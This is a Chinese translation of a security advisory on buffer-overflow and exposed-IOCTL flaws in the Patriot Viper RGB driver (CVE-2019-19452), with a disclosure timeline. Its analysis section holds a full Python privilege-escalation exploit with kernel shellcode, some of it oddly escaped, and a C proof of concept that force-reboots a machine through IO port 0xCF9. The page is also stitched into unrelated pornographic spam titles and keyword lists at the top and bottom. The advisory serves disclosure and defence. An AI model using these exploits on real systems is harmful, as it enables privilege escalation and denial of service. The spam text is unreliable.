精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

對 Viper RGB 驅動多個緩沖區溢出漏洞的分析

安全 漏洞
在處理IoControlCode 0x80102040時,在Viper驅動程序RGB 1.1版中發現緩沖區溢出漏洞。

[[348655]]

0x01 漏洞信息

漏洞類型:基于堆棧的緩沖區溢出[ CWE-121 ],暴露的IOCTL(訪問控制不足)[ CWE-782 ] 影響:代碼執行允許特權提升 遠程可利用:否 本地可利用:是 CVE名稱:  CVE-2019-19452

0x02 漏洞描述

Patriot Memory是一家總部位于美國的技術公司,設計和制造內存模塊,閃存驅動器,移動配件和游戲設備。

在處理IoControlCode 0x80102040時,在Viper驅動程序RGB 1.1版中發現緩沖區溢出漏洞。本地攻擊者可以利用此漏洞,因此獲得NT AUTHORITY \ SYSTEM特權。

IOCTL代碼0x80102050和0x80102054允許具有低特權的用戶從IO端口讀取或向其寫入1/2/4字節。可以通過多種方式來利用它來最終以提升的特權運行代碼。

0x03  安全建議

1.1版和所有以前的版本在每個受支持的Windows版本中都容易受到攻擊(安裝程序:Patriot Viper RGB v1.1.exe)

解決方案和解決方法:

Patriot Memory已發布版本MSIO_191231_v1.2,該版本已修復報告中的漏洞。

這些漏洞是由Core Security Exploit團隊的Ricardo Narvaja和Lucas Dominikow發現的。

0x04  漏洞分析和利用驗證

基于堆棧的緩沖區溢出特權提升

CVE-2019-19452

對版本1.0的漏洞的利用驗證發現了溢出漏洞的存在,該溢出可以覆蓋ZwOpenSection和ZwMapViewOfSection的參數。

1.0版和1.1版之間的二進制代碼差異表明,盡管對這些函數的參數進行了檢查,但先前的溢出漏洞仍存在未進行修補,而CoreLabs在隨后研究中能夠控制其大小。

可以在下面找到有關版本1.0的信息:

https://github.com/active-labs/Advisories/blob/master/ACTIVE-2019-012.md

https://www.activecyber.us/activelabs/viper-rgb-driver-local-privilege-escalation-cve-2019-18845

在版本1.1中,控制器分析IoControlCodes并到達此位置,將IoControlCode與0x80102040進行比較。

  1. .text:0000000000001518 lea     rcx, aIrpMjDeviceCon ; "IRP_MJ_DEVICE_CONTROL" 
  2. .text:000000000000151F call    DbgPrint 
  3. .text:0000000000001524 mov     r11d, [rbp+18h] 
  4. .text:0000000000001528 cmp     r11d, 80102040h 
  5. .text:000000000000152F jz      loc_16D4 

如果比較結果正確,則會調用由CoreLabs控制的MaxCount(要復制的大小)和SRC(源緩沖區)的memmove,沒有進行驗證以確保數據適合目標緩沖區,從而導致堆棧溢出。

  1. .text:00000000000016E8 lea     rcx, [rsp+78h+Src] ; Dst 
  2. .text:00000000000016ED mov     r8, rbx         ; MaxCount 
  3. .text:00000000000016F0 mov     rdx, rsi        ; Src 
  4. .text:00000000000016F3 call    memmove 

由于驅動程序尚未使用安全cookie保護函數的堆棧,因此可以成功執行任意代碼。

可以通過調用CreateFileA來獲取驅動程序的句柄,然后通過發送受控數據來調用DeviceIoControl來實現此功能。下面將使用針對Windows 7 SP1 x64設計PoC,演示針對x64版本驅動程序的代碼執行。該代碼將需要改編為其他Windows版本。

有效利用漏洞取決于目標設備和體系結構的細節。例如,在Windows 10中,有SMEP / SMAP和其他特定的緩解措施。

下面看到的PoC漏洞利用演示了此過程,該過程重用了連接套接字以生成shell并在系統上執行任意命令。

  1. #!/usr/bin/env python 
  2. import struct, sys, os 
  3. from ctypes import * 
  4. from ctypes.wintypes import * 
  5. import os 
  6. import struct 
  7. import sys 
  8. from ctypes import wintypes 
  9.   
  10.   
  11. GENERIC_READ = 0x80000000 
  12. GENERIC_WRITE = 0x40000000 
  13. GENERIC_EXECUTE = 0x20000000 
  14. GENERIC_ALL = 0x10000000 
  15. FILE_SHARE_DELETE = 0x00000004 
  16. FILE_SHARE_READ = 0x00000001 
  17. FILE_SHARE_WRITE = 0x00000002 
  18. CREATE_NEW = 1 
  19. CREATE_ALWAYS = 2 
  20. OPEN_EXISTING = 3 
  21. OPEN_ALWAYS = 4 
  22. TRUNCATE_EXISTING = 5 
  23. HEAP_ZERO_MEMORY=0x00000008 
  24. MEM_COMMIT = 0x00001000 
  25. MEM_RESERVE = 0x00002000 
  26. PAGE_EXECUTE_READWRITE = 0x00000040 
  27.   
  28. ntdll = windll.ntdll 
  29. kernel32 = windll.kernel32 
  30.   
  31. ntdll.NtAllocateVirtualMemory.argtypes = [c_ulonglong, POINTER(c_ulonglong), c_ulonglong, POINTER(c_ulonglong),c_ulonglong,c_ulonglong] 
  32. kernel32.WriteProcessMemory.argtypes = [c_ulonglong, c_ulonglong, c_char_p,  c_ulonglong, POINTER(c_ulonglong)] 
  33.   
  34. GetProcAddress = kernel32.GetProcAddress 
  35. GetProcAddress.restype = c_ulonglong 
  36. GetProcAddress.argtypes = [c_ulonglong, wintypes.LPCSTR] 
  37.   
  38.   
  39. GetModuleHandleA = kernel32.GetModuleHandleA 
  40. GetModuleHandleA.restype = wintypes.HMODULE 
  41. GetModuleHandleA.argtypes = [wintypes.LPCSTR] 
  42.   
  43. k32Dll=GetModuleHandleA("kernel32.dll"
  44. print "0x%X"%(k32Dll) 
  45.   
  46. if (not k32Dll) : 
  47.     print ("[-] Failed To get module handle kernel32.dll\n"
  48.   
  49. WinExec=GetProcAddress(k32Dll, "WinExec"
  50.   
  51. print "0x%X"%(WinExec) 
  52.   
  53. if (not WinExec) : 
  54.     print ("[-] Failed To get WinExec address.dll\n"
  55.   
  56. print "WinExec = 0x%x"%WinExec 
  57.   
  58. raw_input() 
  59.   
  60.   
  61. buf = kernel32.VirtualAlloc(c_int(0x0),c_int(0x824),c_int(0x3000),c_int(0x40)) 
  62.   
  63. shellcode="\x90\x90\x65\x48\x8B\x14\x25\x88\x01\x00\x00\x4C\x8B\x42\x70\x4D\x8B\x88\x88\x01\x00\x00\x49\x8B\x09\x48\x8B\x51\xF8\x48\x83\xFA\x04\x74\x05\x48\x8B\x09\xEB\xF1\x48\\x8b\\x81\\x80\\x00\\x00\\x00\\x24\\xf0\\x49\\x89\\x80\\x08\\x02\\x00\\x00\\x48\\x31\\xc0\\x48\\x81\\xc4\\x28\\x01\\x00\x00\xc3"  
  64.   
  65. #STARTS HERE 
  66. written    = c_ulonglong(0) 
  67. dwReturn      = c_ulong() 
  68. hDevice = kernel32.CreateFileA(r"\\.\Msio",GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, None, OPEN_EXISTING, 0, None ) 
  69.   
  70.   
  71. print "[+] buffer address: 0x%X" % buf 
  72.   
  73. data= "\xeb\x4e" + 0x46  * "A" + struct.pack("<Q",int(buf)) + shellcode 
  74.   
  75. print "%r"%data 
  76.   
  77. kernel32.RtlMoveMemory(c_int(buf),data,c_int(len(data))) 
  78.   
  79. bytes_returned = wintypes.DWORD(0) 
  80. h=wintypes.HANDLE(hDevice) 
  81. b=wintypes.LPVOID(buf) 
  82.               
  83. #TRIGGER 
  84.   
  85. dev_ioctl = kernel32.DeviceIoControl(hDevice, 0x80102040, b, 80, None, 0,byref(dwReturn), None) 
  86.   
  87. os.system("calc.exe"
  88.   
  89. kernel32.CloseHandle(hDevice) 

用python 64位執行該代碼后,將顯示具有NT AUTHORITY \ SYSTEM特權的calc。

端口映射的I / O訪問

盡管當前沒有為該漏洞分配CVE,但是如果MITER分配了其他CVE名稱,則將使用其他信息更新本文檔。

我們可以使用IOCTL代碼0x80102050讀取IO端口。

要指定我們要讀取的IO端口以及要讀取的字節大小,必須發送一個精心制作的緩沖區,其中前兩個字節是IO端口,第六個是要讀取的字節數1、2或4。

此外,可以使用IOCTL代碼0x80102054對IO端口進行寫入。另外,必須發送一個精心制作的緩沖區。此緩沖區與讀取的緩沖區非常相似。主要區別在于我們還需要指定要發送到IO端口的數據。該數據可以為1/2/4字節,并從IO端口(3字節起)旁邊開始,在這種情況下,第六個字節將確定要寫入的字節數。

通過讀取/寫入IO端口我們可以實現利用。例如,以下PoC代碼將通過重新引導計算機來導致拒絕服。

  1. #include  
  2. #include  
  3.   
  4. #define IOCTL_READ_IOPORT 0x80102050  
  5. #define IOCTL_WRITE_IOPORT 0x80102054 
  6.   
  7.   
  8. HANDLE GetDriverHandle(LPCSTR driverName) 
  9.   
  10.     HANDLE hDriver = CreateFile(driverName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 
  11.   
  12.     if (hDriver == INVALID_HANDLE_VALUE) 
  13.     { 
  14.         printf("Failed GetDriverHandle.\nError code:%d\n", GetLastError()); 
  15.         exit(1); 
  16.     } 
  17.   
  18.   
  19.     return hDriver; 
  20.   
  21.   
  22.   
  23. BYTE ReadPort(HANDLE hDriver, unsigned int port) 
  24.     DWORD inBufferSize = 10; 
  25.     DWORD outBufferSize = 1; 
  26.   
  27.     DWORD bytesReturned = 0; 
  28.   
  29.     LPVOID inBuffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
  30.     LPVOID outBuffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
  31.   
  32.   
  33.     if (inBuffer == NULL
  34.     { 
  35.         printf("Failed to allocate inBuffer %d\n", GetLastError()); 
  36.         return 1; 
  37.     } 
  38.   
  39.     if (outBuffer == NULL
  40.     { 
  41.         printf("Failed to allocate outBuffer %d\n", GetLastError()); 
  42.         return 1; 
  43.     } 
  44.   
  45.   
  46.     memcpy((char*)inBuffer, &port, 2); 
  47.     memset((char*)inBuffer + 6, 0x1, 1); 
  48.       
  49.   
  50.     BOOL retDevIoControl = DeviceIoControl(hDriver, IOCTL_READ_IOPORT, inBuffer, inBufferSize, outBuffer, outBufferSize, &bytesReturned, 0); 
  51.   
  52.     if (retDevIoControl == 0) 
  53.     { 
  54.         printf("Failed DeviceIoControl\nError code:%d", GetLastError()); 
  55.         return 1; 
  56.     } 
  57.   
  58.     return (BYTE)(*((char*)outBuffer)); 
  59.   
  60. void WritePort(HANDLE hDriver, unsigned int port, BYTE data) 
  61.   
  62.     DWORD inBufferSize = 10; 
  63.     DWORD outBufferSize = 1; 
  64.   
  65.     DWORD bytesReturned = 0; 
  66.   
  67.     LPVOID inBuffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
  68.     LPVOID outBuffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
  69.   
  70.     if (inBuffer == NULL
  71.     { 
  72.         printf("Failed to allocate inBuffer %d\n", GetLastError()); 
  73.         exit(1); 
  74.     } 
  75.   
  76.     if (outBuffer == NULL
  77.     { 
  78.         printf("Failed to allocate outBuffer %d\n", GetLastError()); 
  79.         exit(1); 
  80.     } 
  81.   
  82.   
  83.   
  84.     memcpy((char*)inBuffer, &port, 2); 
  85.     memcpy((char*)inBuffer + 2, &data, 1); 
  86.     memset((char*)inBuffer + 6, 0x1, 1);  
  87.   
  88.   
  89.   
  90.     BOOL retDevIoControl = DeviceIoControl(hDriver, IOCTL_WRITE_IOPORT, inBuffer, inBufferSize, outBuffer, outBufferSize, &bytesReturned, 0); 
  91.   
  92.     if (retDevIoControl == 0) 
  93.     { 
  94.         printf("Failed DeviceIoControl\nError code:%d", GetLastError()); 
  95.         exit(1); 
  96.     } 
  97.   
  98.   
  99.   
  100. int main(int argc, char** argv) 
  101.     LPCSTR driverName = (LPCSTR)"\\\\.\\Msio"
  102.   
  103.   
  104.     HANDLE hDriver = GetDriverHandle(driverName); 
  105.   
  106.     BYTE portCF9 = ReadPort(hDriver, 0xcf9) & ~0x6; 
  107.       
  108.     WritePort(hDriver, 0xcf9, portCF9 | 2); 
  109.       
  110.     Sleep(50); 
  111.       
  112.     WritePort(hDriver, 0xcf9, portCF9 | 0xe); // Cold Reboot 
  113.       
  114.   
  115.     CloseHandle(hDriver); 
  116.   
  117.   
  118.     return 0; 

0x05 漏洞披露時間表

2019年11月6日– CoreLabs通過support@patriotmem.com向供應商發出了聯系電子郵件,  要求披露。

2019年11月26日–通過MITER網站申請CVE,收到申請確認。

2019年11月29日– MITER將CVE-2019-19452分配給第一個漏洞。

2019年12月5日–稱為Patriot Memory HQ(510-979-1021),已通過自動電話系統轉發給技術支持,還留下了留言信息和電子郵件。

2019年12月5日–收到來自賣方的電子郵件,要求進一步的信息。回復了非常基本的描述,并要求在發送POC之前確認此電子郵件是公司的首選公開方法。

2019年12月17日–收到來自供應商Patriot R&D的電子郵件,其中確認了提交方式并將其命名為主要聯系人,回復了PoC。

2020年1月1日–收到來自供應商的電子郵件,其中附有建議的修復程序。

2020年1月8日–確認補丁程序正確。與供應商確認補丁程序有效,并詢問他們何時發布補丁程序。

2020年1月9日–供應商聲明該補丁最多需要兩周才能發布(2020年1月23日)。

2020年1月16日–通過電子郵件發送給供應商,以確認23日的一切按計劃進行。說明我們打算在24日發布。

2020年1月16日–發現第二個未通過補丁解決的漏洞。新的POC發送給愛國者。

2020年1月20日–收到來自供應商的電子郵件,指出他認為發現第二個漏洞可能會延遲發布有問題的補丁。

2020年2月7日– Tweet由第三方發布在Twitter上,其中包含有關Viper RGB漏洞的信息。CoreLabs驗證了推文中的信息是否正確,數據現在處于公開狀態。

2020年2月8日–向MITRE請求第二個漏洞的CVE身份。

2020年2月8日–向Patriot請求第二個漏洞的補丁程序狀態,并告知他們該信息現已在Twitter上公開。

2020年2月10日–Patriot回應說,第二個漏洞目前沒有補丁。

2020年2月12日–告知Patriot,隨著有關漏洞的信息公開,CoreLabs計劃在2020年2月17日發布,除非在2020年2月14日之前收到進一步的溝通。

2020年2月17日–已發布咨詢CORE-2020-0001。

參考信息:

https://www.viper.patriotmemory.com/viperrgbdramsoftware

https://www.coresecurity.com/contact

本文翻譯自:​https://www.coresecurity.com/advisories/viper-rgb-driver-multiple-vulnerabilities?source=twitter&code=CMP-0000001929&ls=100000000&utm_campaign=core-cts-emails&utm_content=117968468&utm_medium=social&utm_source=twitter&hss_channel=tw-17157238如若轉載,請注明原文地址。

 

責任編輯:姜華 來源: 嘶吼網
相關推薦

2020-08-10 08:37:32

漏洞安全數據

2018-11-01 08:31:05

2011-11-15 16:00:42

2022-08-09 08:31:40

C -gets函數漏洞

2015-09-02 09:01:03

2017-01-09 17:03:34

2019-02-27 13:58:29

漏洞緩沖區溢出系統安全

2017-08-30 20:49:15

2014-07-30 11:21:46

2009-09-24 18:16:40

2018-01-26 14:52:43

2010-09-29 15:59:04

2010-12-27 10:21:21

2011-02-24 09:21:31

2010-10-09 14:45:48

2015-03-06 17:09:10

2011-03-23 12:39:44

2010-09-08 15:43:18

2021-01-27 18:03:52

漏洞網絡安全網絡攻擊

2011-07-20 10:54:14

C++
點贊
收藏

51CTO技術棧公眾號

精品久久久久久久久久| 极品美女销魂一区二区三区 | 一二三区中文字幕| 国产精品99在线观看| 日韩亚洲欧美高清| wwwxxx黄色片| 色老头在线观看| 久久午夜色播影院免费高清| 成人精品视频99在线观看免费| 免费一级黄色大片| 国产影视一区| 精品久久久久久综合日本欧美 | 午夜激情电影在线播放| 国产精品三级视频| 激情视频一区二区| 91丨九色丨蝌蚪丨对白| 宅男噜噜噜66国产日韩在线观看| 尤物yw午夜国产精品视频明星| gogo亚洲国模私拍人体| 色天使综合视频| 亚洲成av人片一区二区三区| 亚洲午夜激情| 男女av在线| av高清不卡在线| 亚洲一区二区三区乱码aⅴ蜜桃女| 在线观看国产亚洲| 欧美一区不卡| 少妇高潮久久77777| 黄色在线观看av| 中文字幕一区二区三区四区久久| 欧美丝袜第三区| 红桃av在线播放| free性护士videos欧美| 亚洲精品中文在线| 亚洲最大免费| √天堂资源地址在线官网| 92国产精品观看| 国产精品久久久久久久久久久久冷 | 欧美/亚洲一区| 在线色欧美三级视频| 日本高清www| 欧美日韩另类图片| 亚洲激情中文字幕| 国产精品久久久久久在线观看| 国色天香久久精品国产一区| 欧美卡1卡2卡| 亚洲综合日韩欧美| 黄页免费欧美| 精品视频999| 激情视频免费网站| 成人午夜亚洲| 欧美裸体bbwbbwbbw| 99re精彩视频| 成人在线视频www| 欧美日本在线观看| 亚洲图色中文字幕| 国产精品一区二区三区www| 欧美三级电影网| 国产精品视频中文字幕| 日韩五码电影| 欧美一区二区三区免费大片| 秋霞午夜鲁丝一区二区| 18国产精品| 日韩高清欧美高清| 成人国产精品久久久网站| 欧美美乳视频| 中文字幕亚洲专区| 东方av正在进入| 国产精品99免费看| 91国产精品电影| 日本韩国欧美中文字幕| 视频一区中文字幕| 国产日韩在线视频| 国内精品偷拍视频| www.66久久| 日韩.欧美.亚洲| 日本中文字幕在线2020| 亚洲老司机在线| 精品国产一区三区| 色综合一本到久久亚洲91| 欧美日韩视频在线观看一区二区三区| caoporm在线视频| 一区二区三区在线免费看| 亚洲国产精品字幕| 级毛片内射视频| 亚洲一区二区三区| 97av在线视频| 亚洲综合精品国产一区二区三区| 国产精品综合一区二区| 久久久久久久久久码影片| www.成人.com| 亚洲已满18点击进入久久| 91精品91久久久中77777老牛| 成人免费毛片嘿嘿连载视频…| 欧美一级淫片007| 国产精品无码久久久久久| 国产精品99久久| 97视频色精品| 国产精品爽爽久久久久久| 成人动漫视频在线| 在线观看亚洲视频啊啊啊啊| 91老司机福利在线| 欧美日韩国产一区二区三区地区| 国产视频精品视频| 99久久亚洲精品蜜臀| 亚州成人av在线| 国产乱人乱偷精品视频a人人澡| 97精品久久久午夜一区二区三区| 亚洲精品在线视频观看| 欧美调教sm| 欧美一区二区免费视频| 无码少妇精品一区二区免费动态| 国产在线不卡| 国产一区香蕉久久| 可以在线观看的av| 亚洲国产精品一区二区www| 制服丝袜综合网| 西野翔中文久久精品字幕| 久久综合伊人77777蜜臀| 成人一级免费视频| 91日韩在线专区| 精品人妻人人做人人爽| 青青在线精品| 在线亚洲午夜片av大片| 国产精品视频免费播放| 成人性生交大片免费看视频在线| 一区二区视频国产| 三级成人黄色影院| 日韩成人小视频| 日本少妇激情视频| 极品少妇一区二区| 欧美性视频在线播放| 视频一区在线免费看| 亚洲欧美综合图区| 国产香蕉视频在线| 波多野结衣精品在线| 国产乱子伦精品视频| 99久久婷婷国产综合精品首页| 亚洲精品久久久久久久久久久久久| 超碰手机在线观看| 国产乱子伦视频一区二区三区 | 久久xxxx| 久久精品ww人人做人人爽| 2021天堂中文幕一二区在线观| 日韩欧美卡一卡二| 丰满少妇高潮久久三区| 国产老女人精品毛片久久| 国产系列第一页| 成人免费91| 免费91在线视频| a天堂在线观看视频| 亚洲免费av高清| 中文字幕一二三| 亚洲午夜精品久久久久久app| av资源一区二区| 国产精品偷拍| 亚洲精品电影网站| 91在线视频在线观看| 91久色porny| 欧美日韩在线免费播放| 欧洲乱码伦视频免费| 成人h视频在线观看播放| 国产在线观看a视频| 精品少妇一区二区三区在线播放| 久久精品国产亚洲av高清色欲 | 亚洲色图综合区| 国产成人在线视频免费播放| 男人天堂a在线| 欧美男人操女人视频| 国产成人一区三区| 蜜桃视频网站在线观看| 日韩一区二区不卡| 影音先锋亚洲天堂| 国产精品久久久久影视| 黄色三级视频在线播放| 亚洲毛片播放| 日韩午夜视频在线观看| 国产成人久久精品一区二区三区| 欧美精品激情在线观看| 蜜芽tv福利在线视频| 欧美区视频在线观看| 国产福利久久久| 久久久久久久久伊人| 黄色小视频免费网站| 国产精品hd| 欧美久久电影| 欧美日本三级| 国产成人久久精品| 日本高清成人vr专区| 国产视频久久久| 国产欧美熟妇另类久久久 | gogogo高清免费观看在线视频| 亚洲最大黄网| 欧美一区二区福利| 免费看日产一区二区三区| 欧美中文字幕精品| av免费在线观看网址| 亚洲美女喷白浆| 国产人妖一区二区三区| 色哟哟欧美精品| 妺妺窝人体色www聚色窝仙踪| 国产欧美一区二区三区网站| 18禁一区二区三区| 日本aⅴ精品一区二区三区| 日本精品久久久久久久久久| 日韩精品水蜜桃| 噜噜噜噜噜久久久久久91| 精品成人18| 国产精品视频白浆免费视频| 91www在线| 久久99视频免费| www.成人.com| 国产视频精品xxxx| 亚洲av无码乱码在线观看性色| 欧美午夜精品电影| 99久热在线精品996热是什么| 亚洲综合久久久| 九九这里只有精品视频| 国产亚洲综合av| 中文在线永久免费观看| 国产成人亚洲综合色影视| 三级一区二区三区| 日本va欧美va欧美va精品| 日韩在线视频在线观看| 一区在线免费观看| 国产美女作爱全过程免费视频| 国产精品国产一区| 一本一道久久a久久精品综合| 国产精品美女久久久久久不卡 | 成人免费在线电影| 亚洲老头同性xxxxx| 日韩在线一区二区三区四区| 日韩精品一区二区三区在线播放 | 免费人成自慰网站| 欧美国产三区| 亚洲黄色网址在线观看| 色男人天堂综合再现| 午夜老司机精品| 波多野结衣在线观看一区二区| 欧美日韩免费观看一区| 蜜桃视频欧美| 欧美亚洲爱爱另类综合| 九九精品在线| 日本一区二区三区视频免费看| 欧美**字幕| 日韩区国产区| 色婷婷一区二区三区| 在线亚洲美日韩| 久久精品亚洲人成影院 | 丁香花在线电影小说观看 | 欧美中文字幕精在线不卡| 欧美孕妇与黑人孕交| 中文字幕在线官网| 国产97在线视频| 久久精品xxxxx| 91精品视频观看| 一区二区三区欧洲区| 国产亚洲欧美一区二区| 九色丨蝌蚪丨成人| 久久精品一区二区三区不卡免费视频 | 亚洲91av| 91精品国产九九九久久久亚洲| 欧美男男tv网站在线播放| 国产精品高潮呻吟视频| 欧美性aaa| 鬼打鬼之黄金道士1992林正英| 麻豆国产欧美一区二区三区r| 精品一区二区国产| 国产一区99| 一级全黄肉体裸体全过程| 欧美日韩精品| 久久9精品区-无套内射无码| 蜜臀av亚洲一区中文字幕| 天堂在线一区二区三区| 丰满白嫩尤物一区二区| 好吊视频在线观看| 日韩毛片视频在线看| 日韩少妇裸体做爰视频| 欧美性高清videossexo| 亚洲av无码乱码国产精品| 日韩精品在线电影| 久操视频在线免费播放| 97人洗澡人人免费公开视频碰碰碰| 亚洲mmav| 国产欧美日韩伦理| 成人在线免费视频观看| 丁香婷婷综合激情| 日韩1区2区日韩1区2区| 国产一级片中文字幕| 99久久婷婷国产综合精品| 一级黄色毛毛片| 亚洲成av人片一区二区梦乃| 中文字幕丰满人伦在线| 精品av久久707| 成人在线二区| 97成人精品区在线播放| 91精品福利观看| 欧美日韩一区二区三区免费| 91九色精品国产一区二区| 131美女爱做视频| 精品一区二区免费视频| 亚洲人成人无码网www国产| 一区二区三区欧美在线观看| 亚洲男人天堂网址| 亚洲国产精彩中文乱码av在线播放| 成全电影播放在线观看国语| 久久露脸国产精品| 99热这里有精品| 偷拍视频一区二区| 一区二区福利| 佐佐木明希电影| 中文字幕日韩一区二区| 中文字幕在线天堂| 亚洲精品成人免费| 好久没做在线观看| 91av一区二区三区| 91九色精品| 亚洲xxx在线观看| 久久久久久综合| 男人的天堂一区二区| 日韩一区二区在线观看视频播放| 92国产在线视频| 国产成人精品一区| 国产欧美久久一区二区三区| 日本丰满少妇xxxx| 成人小视频免费观看| 黄色一级片在线免费观看| 欧美精品乱码久久久久久| a中文在线播放| 国产精品igao视频| 欧美**字幕| 亚洲色图38p| 国产亚洲福利社区一区| 精品人妻一区二区色欲产成人| 亚洲国产欧美一区| 高潮在线视频| 九色综合日本| 久久激情视频| 中文字幕成人动漫| 在线视频一区二区三| 国产女人在线视频| 国产精品啪视频| 欧美激情另类| 久久久久xxxx| 亚洲激情图片qvod| 成人免费视频国产| 久久久最新网址| 欧美三级自拍| 欧美精品色婷婷五月综合| 久久久91精品国产一区二区精品| 国产精品久免费的黄网站| 亚洲人线精品午夜| 日韩欧美2区| 在线观看精品视频| 国产99久久久久久免费看农村| 国产一级免费av| 日韩av一区在线观看| 欧美aa视频| 一本色道婷婷久久欧美| 国产成人一级电影| 天堂中文在线网| 日韩亚洲综合在线| 欧美高清一级片| 国产免费毛卡片| 欧美激情一二三区| 国产高清免费在线观看| 性欧美xxxx| 狠狠色丁香婷婷综合影院| 欧美丝袜在线观看| 亚洲国产一区二区三区 | 国产日韩欧美精品综合| 亚洲天堂视频在线| 欧美激情性做爰免费视频| 天堂综合网久久| 三上悠亚av一区二区三区| 一区二区三区中文字幕电影| 亚洲av片在线观看| 国产色视频一区| 影音先锋中文字幕一区| www.黄色在线| 欧美大片拔萝卜| 麻豆精品蜜桃| 菠萝蜜视频在线观看入口| 久久亚洲一级片| 国产wwwxxx| 国产z一区二区三区| 欧美精品九九| 日本少妇高潮喷水xxxxxxx| 日韩一级高清毛片| 色婷婷综合久久久中字幕精品久久| 日韩精品一区二区三区电影| 97se亚洲国产综合在线| 国产色综合视频| 日本不卡视频在线播放| 久久久久亚洲| 精品少妇一区二区三区免费观| 欧美一区二区在线免费播放| 欧美magnet| xxxx18hd亚洲hd捆绑| 国产精品久久久久久久久免费丝袜|